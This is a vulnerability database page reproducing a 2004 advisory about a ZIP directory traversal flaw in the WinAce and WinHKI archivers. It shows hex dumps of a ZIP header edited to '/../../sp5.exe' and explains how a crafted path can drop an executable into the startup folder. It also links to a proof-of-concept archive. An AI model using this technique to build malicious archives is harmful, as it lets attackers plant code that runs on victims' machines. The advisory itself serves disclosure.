Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

winaceHKI.txt

🗓️ 07 Jan 2005 00:00:00Reported by Rafel IvgiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

WinAce and WinHKI have a ZIP file directory traversal vulnerability exploitable locally.

Code
`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application: WinAce, WinHKI  
Vendors: http://www.webtoolmaster.com  
Versions: 1.4d  
Platforms: Windows  
Bug: ZIP File Directory Transversal  
Exploitation: Local (extract file)  
Date: 24 Dec 2004  
Author: Rafel Ivgi, The-Insider  
E-Mail: [email protected]  
Website: http://theinsider.deep-ice.com  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
1) Introduction  
2) Bugs  
3) The Code  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===============  
1) Introduction  
===============  
  
WinHKI is a file archiever which supports: BH, CAB, HKI, JAR, LHA,TAR, GZ  
compressions.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
======  
2) Bug  
======  
  
This is a normal ZIP compressed file header  
  
00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..  
00000010 F209 3C2F 0F00 C8EE 0F00 0700 0000 7370 ..</..........sp  
00000020 352E 6578 65EC 5A7F 5454 577E 7F33 0C30 5.exe.Z.TTW~.3.0  
00000030 C0C0 1B94 8926 6A32 2AAE D9FC 206E 2628 .....&j2*... n&(  
00000040 2018 1186 4044 7D3A E40D 4940 4304 7CCC ...@D}:..I@C.|.  
  
in the following code, we can see how easy it is to change the path  
to anywhere we want, including the all users start up folder.  
I just overwrited the original long file name to /../../sp5.exe  
  
00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..  
00000010 F209 3C2F 0F00 C8EE 0F00 1000 0000 7662 ..</..........vb  
00000020 2F2E 2E2F 2E2E 2F73 7035 2E65 7865 EC5A /../../sp5.exe.Z  
00000030 7F54 5457 7E7F 330C 30C0 C01B 9489 266A .TTW~.3.0.....&j  
00000040 322A AED9 FC20 6E26 2820 1811 8640 447D 2*... n&( ...@D}  
  
All we need to do is zip compress (using winzip, winrar, winace)  
a file with a long name/path and change the path specified inside the file  
to whatever we want Using any Hex editor such as HexWorkshop, just add  
anything to the filename.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===========  
3) The Code  
===========  
  
An online proof of concept can be found at:  
http://theinsider.web1000.com/WINACE-WINHKI ZIP TRANSVERSAL.zip  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
---  
Rafel Ivgi, The-Insider  
http://theinsider.deep-ice.com  
  
"Scripts and Codes will make me D.O.S , but they will never HACK me."  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Jan 2005 00:00Current
7.4High risk
Vulners AI Score7.4
winace vulnerability winhki exploitation zip file traversal local exploitation hex editor usage windows platform 2004 security issue rafel ivgi author
19